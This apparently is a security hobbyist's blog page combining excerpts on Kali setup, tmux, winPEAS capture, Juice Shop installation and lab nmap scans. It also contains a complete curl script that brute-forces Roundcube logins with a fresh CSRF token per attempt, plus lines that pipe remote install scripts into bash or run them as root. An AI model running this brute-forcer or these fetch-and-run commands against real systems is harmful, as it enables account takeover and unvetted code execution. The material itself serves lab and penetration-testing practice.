
Turbo Intruder with Burp Macros - CSRF tokens

I was testing some brute force attacks against Roundcube. I tried Burp Suite, ZAP and my own Python script. Burp Community Edition was kind of slow, I couldn't get ZAP to fetch the correct CSRF token, and the Python script was faster than Burp but still a little slow. Then I found Turbo Intruder, a Burp extension. It's very fast because, as its README puts it: "Turbo Intruder uses a HTTP stack hand-coded from scratch with speed in mind. As a result, on many targets it can seriously outpace even fashionable asynchronous Go scripts."

When I finally figured out how to get Turbo Intruder to fetch a new CSRF token for each request using Burp's session handling macros, I compared it to my Python script and it definitely was much faster. For the same attack (the same number of password attempts against one user), the Python script took about 30 minutes and Turbo Intruder took about 3 minutes.
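Written out as plain curl, here is the token handling that the session macro performs before each Turbo Intruder request. This is an added example, not the post's Turbo Intruder setup or its Python script, and a sequential curl loop is the slow approach the post replaced; the point is the per-attempt token dance, not speed. Assumptions not taken from the post: Roundcube's login form carries the token in a hidden input named _token tied to the session cookie, the form posts _task, _action, _user, _pass and _token, and a successful login answers with a 302 to ?_task=mail. The host name in the usage comments is a placeholder.

```bash
# Added example, not the post's script: one fresh CSRF token per login attempt
# against a Roundcube login form, driven by curl.
# Assumed, not taken from the post: the token is a hidden input named "_token"
# bound to the session cookie, the form fields are _task, _action, _user, _pass
# and _token, and a successful login answers 302 to ?_task=mail.

# Print the value of the hidden _token input found in HTML read on stdin.
extract_token() {
    sed -n 's/.*name="_token"[^>]*value="\([^"]*\)".*/\1/p' | head -n 1
}

# Decide from "STATUS REDIRECT_URL" (curl --write-out) whether a login worked:
# a valid login is bounced to the mail task, a failure redisplays the form.
login_succeeded() {
    case $1 in
        "302 "*"_task=mail"*) return 0 ;;
        *) return 1 ;;
    esac
}

# One attempt: fetch the form with a fresh cookie jar so the token and the
# session cookie match, then post user/password with that token.
# Prints "STATUS REDIRECT_URL".
# Usage: login_attempt https://mail.example.test alice Winter2024
login_attempt() {
    base=$1 user=$2 pass=$3
    jar=$(mktemp)
    token=$(curl -s -c "$jar" "$base/?_task=login" | extract_token)
    if [ -z "$token" ]; then
        rm -f "$jar"
        echo "000 no-token"
        return 2
    fi
    # -b/-c reuse and update the same jar; --data-urlencode encodes the values
    curl -s -o /dev/null -w '%{http_code} %{redirect_url}' -b "$jar" -c "$jar" \
        --data-urlencode "_task=login" --data-urlencode "_action=login" \
        --data-urlencode "_token=$token" --data-urlencode "_user=$user" \
        --data-urlencode "_pass=$pass" "$base/"
    rm -f "$jar"
}

# Walk a wordlist for one user; stop at the first password that logs in.
# Usage: brute_force https://mail.example.test alice passwords.txt
brute_force() {
    base=$1 user=$2 list=$3
    while IFS= read -r pw; do
        result=$(login_attempt "$base" "$user" "$pw")
        if login_succeeded "$result"; then
            echo "valid: $user:$pw"
            return 0
        fi
    done < "$list"
    return 1
}
```

The cookie jar is created fresh for every attempt and shared by the GET and the POST, which is the whole point: a token only validates against the session that issued it, so a token scraped once and reused gets every later attempt rejected as an invalid request rather than a wrong password. That is exactly the work a session handling macro has to do before each request Turbo Intruder sends.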

Here is a quick list of how to get it set up in Burp Suite (see screenshots below):

i3 Window Manager on Kali Linux

When it comes to Kali I've always used whatever it comes with, but I recently found Dewalt's amazing pimpmyi3 script and was blown away by how easily I could get i3 set up on Kali, along with pimpmykali and lots of other bonus tools. It's all pretty awesome.

With a clean, fresh Kali VM ready to go you just need to cd into /opt and run the commands from the pimpmyi3 GitHub README. Either do sudo su - to become root for the installation or use sudo for each command that needs it. When I run pimpmy-i3.sh I pick the first option, setting it up for the root account.

cd /opt
rm -rf pimpmyi3/
git clone https://github.com/Dewalt-arch/pimpmyi3
cd pimpmyi3
sudo ./pimpmy-i3.sh

It takes a little while to finish, just like pimpmykali. When it's done you'll need to reboot. After rebooting I noticed that i3 itself still wasn't installed, but you can install it with apt.

Save Lists of Kali Tools in Text Files

When I set up a new Kali VM I create lists of all the packages and tools that were installed on the previous VM, in case there is something I forgot about and might want again, or I want to know which version of a tool I was using so I can keep using it. It can be hard to remember how a tool was installed (dpkg, apt, pip3 or even pip), so I create a list for each of them.

First I usually make a directory to hold the files.

mkdir installed_packages
cd installed_packages

dpkg piped into a couple of other commands gives a clean list of package names:

dpkg --get-selections | grep -v deinstall | cut -f 1 > dpkg_installed.txt

apt list --installed gives the same packages as dpkg and also shows the versions.
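The same inventory extended to all four package managers, plus a diff against an older VM's list, as an added example (not the post's commands). pip's --format=freeze and apt's --installed are real options of those tools; the directory name, the file names and the extra /opt listing are this example's own choices.

```bash
# Added example, not the post's commands: collect the package inventories the
# post describes into one dated directory, one file per package manager, and
# compare a saved list against the current VM.

# Reduce "dpkg --get-selections" output (read on stdin) to a clean name list:
# drop packages marked deinstall (removed, config left behind) and keep only
# the first tab-separated column.
clean_dpkg_selections() {
    grep -v 'deinstall$' | cut -f 1
}

# Write every inventory into DIR (default: installed_packages_<date>) and
# print the directory name.
# Usage: save_package_lists [DIR]
save_package_lists() {
    dir=${1:-installed_packages_$(date +%F)}
    mkdir -p "$dir"
    dpkg --get-selections | clean_dpkg_selections > "$dir/dpkg_installed.txt"
    # apt list shows version and architecture too; its "no stable CLI
    # interface" warning goes to stderr and is dropped here
    apt list --installed 2>/dev/null > "$dir/apt_installed.txt"
    # freeze format (name==version) can be replayed later with "pip install -r"
    if command -v pip3 >/dev/null 2>&1; then
        pip3 list --format=freeze > "$dir/pip3_freeze.txt"
    fi
    if command -v pip >/dev/null 2>&1; then
        pip list --format=freeze > "$dir/pip_freeze.txt"
    fi
    # tools built from source or dropped into /opt leave no package record
    ls -1 /opt > "$dir/opt_dirs.txt"
    echo "$dir"
}

# Print names present in OLD_LIST but absent from NEW_LIST (both plain name
# lists such as dpkg_installed.txt): what the new VM still lacks.
# Usage: missing_packages old_vm/dpkg_installed.txt new_vm/dpkg_installed.txt
missing_packages() {
    old=$(mktemp) new=$(mktemp)
    sort -u "$1" > "$old"
    sort -u "$2" > "$new"
    comm -23 "$old" "$new"    # comm needs sorted input; -23 keeps file-1-only lines
    rm -f "$old" "$new"
}
```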

Pipe colored winPEAS output to a file

I wanted a way to save the winPEAS output to a text file with all the colors intact, so I could view the file offline with cat in Kali and see the same colored output. I looked at tmux first since that is what I use, and found the answer in the Advanced Use section of the tmux wiki under piping pane changes: with pipe-pane you can pipe a pane's output to a command. The command I pipe into is tee, which reads its input and writes it both to a file and to standard output. The option I'm using is -a:

$ tee --help
Usage: tee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

  -a, --append              append to the given FILEs, do not overwrite
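The pipe-pane recipe as a pair of shell functions, plus an offline check that the colour codes really end up in the file. This is an added example, not the post's own key binding or command line, and the log file path in the usage comment is a placeholder.

```bash
# Added example, not the post's commands: the pipe-pane + tee -a capture the
# post describes, and an offline check that ANSI colour codes survive it.

# Toggle piping of the current pane's output into LOGFILE. -o opens a pipe
# only if none is open, so bound to a key this switches capture on and off;
# tee -a appends, so a second capture never truncates the first. tmux points
# the command's stdout at /dev/null, so only the file matters.
# Usage (inside tmux): toggle_pane_log ~/loot/winpeas.txt
toggle_pane_log() {
    [ -n "$TMUX" ] || { echo "run this inside a tmux pane" >&2; return 1; }
    tmux pipe-pane -o "tee -a '$1'"
}

esc=$(printf '\033')

# Feed one red line through tee -a exactly as pipe-pane would feed pane bytes,
# then confirm the escape sequences, not just the text, landed in LOGFILE.
# Usage: colour_roundtrip /tmp/capture.txt "some text"
colour_roundtrip() {
    printf '\033[1;31m%s\033[0m\n' "$2" | tee -a "$1" >/dev/null
    grep -qF "${esc}[1;31m$2${esc}[0m" "$1"
}

# Remove SGR colour codes from stdin, for grepping or diffing a capture.
strip_colours() {
    sed "s/${esc}\[[0-9;]*m//g"
}
```

cat shows the colours because the terminal interprets the escape sequences; less needs -R to do the same, and grep or diff over the capture is easier after strip_colours.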

Install Juiceshop from sources in Kali

There are some vulnerabilities in Juiceshop that won't work if you install it with Docker or some other methods. XXE Data Access is one that doesn't work with the Docker installation. I install Juiceshop from sources with Node.js so every vulnerability is supported. I also use the fish shell, and there is a little extra setup for fish.

Instead of installing Node.js with apt, it's better to use nvm. With nvm you can install multiple versions of Node and switch back and forth between them.
github.com/nvm-sh/nvm

curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.2/install.sh | bash

After it's installed, check that it added these lines to .zshrc or .bashrc, whichever one you are using. From the nvm README:

"Running either of the above commands downloads a script and runs it. The script clones the nvm repository to ~/.nvm, and attempts to add the source lines from the snippet below to the correct profile file (~/.bash_profile, ~/.zshrc, ~/.profile, or ~/.bashrc)."

export NVM_DIR="$([ -z "${XDG_CONFIG_HOME-}" ] && printf %s "${HOME}/.nvm" || printf %s "${XDG_CONFIG_HOME}/nvm")"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm

If you are using fish (github.com/fish-shell/fish-shell), you'll need to install a few more things and create a config file.

tmux configuration

Here is how I set up tmux in Kali. This is the file I start with, or just use as it is: tmux.conf

Put the .tmux.conf file in the home directory, wherever your home may be: /home/USERNAME/.tmux.conf or /root/.tmux.conf

I usually use Kali as root. The easiest way to get started with root in Kali is with the incredibly handy pimpmykali.

Create a tmux plugins directory inside the home directory (-p also creates the .tmux parent if it does not exist yet):

cd /root/
mkdir -p /root/.tmux/plugins

Use git to clone tpm:

...

HackTheBox - Active

Run nmap to see what's open. The name of the machine should make it obvious that we're looking at Active Directory, and the ports confirm it: Kerberos (88), LDAP (389/636) and the global catalog (3268/3269) together are the signature of a domain controller.

$ nmap -vvv -sC -sV -oA nmap/active.nmap 10.10.10.100 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-07 20:16 EDT
...
Discovered open port 53/tcp on 10.10.10.100
Discovered open port 445/tcp on 10.10.10.100
Discovered open port 139/tcp on 10.10.10.100
Discovered open port 135/tcp on 10.10.10.100
Discovered open port 49158/tcp on 10.10.10.100
Discovered open port 49155/tcp on 10.10.10.100
Discovered open port 3269/tcp on 10.10.10.100
Discovered open port 49157/tcp on 10.10.10.100
Discovered open port 49165/tcp on 10.10.10.100
Discovered open port 3268/tcp on 10.10.10.100
Discovered open port 49154/tcp on 10.10.10.100
Discovered open port 464/tcp on 10.10.10.100
Discovered open port 593/tcp on 10.10.10.100
Discovered open port 389/tcp on 10.10.10.100
Discovered open port 49153/tcp on 10.10.10.100
Discovered open port 88/tcp on 10.10.10.100
Discovered open port 636/tcp on 10.10.10.100
Discovered open port 49152/tcp on 10.10.10.100
...


TryHackMe - Kenobi

Run nmap:

$ nmap -vvv -Pn -sCV -p0-65535 --reason -oN kenobi.nmap 10.10.119.248
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-12 17:32 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:32
Completed NSE at 17:32, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:32
Completed NSE at 17:32, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:32
Completed NSE at 17:32, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 17:32
Completed Parallel DNS resolution of 1 host. at 17:32, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 17:32
Scanning 10.10.119.248 [65536 ports]
Discovered open port 445/tcp on 10.10.119.248
Discovered open port 111/tcp on 10.10.119.248
Discovered open port 139/tcp on 10.10.119.248
Discovered open port 80/tcp on 10.10.119.248
Discovered open port 22/tcp on 10.10.119.248
Discovered open port 21/tcp on 10.10.119.248
Discovered open port 35627/tcp on 10.10.119.248
Discovered open port 39223/tcp on 10.10.119.248

...
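Both scans above print one "Discovered open port" line per port before the service table. Here is an added example (not from either write-up) that turns those lines into a port list for a focused follow-up scan and flags the domain-controller signature the Active scan shows; the sample lines are constructed in the same format with ports from the Active scan, and the -oA output prefix is this example's choice.

```bash
# Added example, not from the Active or Kenobi write-ups: parse nmap's verbose
# "Discovered open port" lines into a -p list and a follow-up scan command.

# Constructed sample in the format nmap -vvv prints; ports from the Active scan.
SAMPLE_NMAP='Discovered open port 445/tcp on 10.10.10.100
Discovered open port 88/tcp on 10.10.10.100
Discovered open port 389/tcp on 10.10.10.100
Discovered open port 3268/tcp on 10.10.10.100
Discovered open port 139/tcp on 10.10.10.100
Completed SYN Stealth Scan at 20:16, 2.10s elapsed'

# Read nmap output on stdin, print the open TCP ports as a sorted comma list
# (the form -p accepts), duplicates removed.
open_ports() {
    sed -n 's/^Discovered open port \([0-9]*\)\/tcp on .*$/\1/p' | sort -n -u | paste -s -d, -
}

# On a Windows network, Kerberos (88) together with LDAP (389) is the domain
# controller signature; the global catalog (3268/3269) makes it certain.
# Usage: looks_like_dc 88,139,389,445
looks_like_dc() {
    case ",$1," in
        *,88,*) case ",$1," in *,389,*) return 0 ;; esac ;;
    esac
    return 1
}

# Print the follow-up: script and version detection only on the ports found
# open, instead of re-scanning the whole range.
# Usage: followup_scan_cmd PORTS NAME TARGET
followup_scan_cmd() {
    printf 'nmap -sCV -p %s -oA nmap/%s_open %s\n' "$1" "$2" "$3"
}

# Stand-alone demo on the sample; on a real scan use: open_ports < active.nmap
ports=$(printf '%s\n' "$SAMPLE_NMAP" | open_ports)
followup_scan_cmd "$ports" active 10.10.10.100
looks_like_dc "$ports" && echo "88 and 389 both open: expect a domain controller"
```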
